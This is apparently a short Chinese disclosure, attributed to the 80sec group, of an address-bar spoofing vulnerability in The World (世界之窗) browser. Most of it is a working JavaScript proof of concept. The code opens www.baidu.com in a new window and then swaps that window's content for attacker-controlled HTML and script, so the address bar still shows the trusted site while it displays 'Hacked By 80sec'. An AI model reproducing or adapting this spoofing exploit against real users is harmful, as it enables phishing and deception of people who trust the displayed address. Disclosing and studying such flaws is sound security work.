世界之窗(The World)浏览器地址栏欺骗漏洞

                                                <br>
+++++++++++++++++++++++++++++++++++++++++
<br>
新打开的链接，地址栏是http://www.baidu.com
<br>
内容却是被人恶意控制的
 
<br>
<br>
    <a href="javascript:win()">Baidu</a>
    <script>
    function win(){
        x=window.open('http://www.baidu.com');
        x.location="about:Baidu要过冬了<br><br>其实80sec说了也不算数了......<script>document.title=\"Hacked By 80sec\"</sc"+"ript>";
    }
    </script>
<br>
<br>
++++++++++++++++++++++++++++++++++++++++
<br>
<br>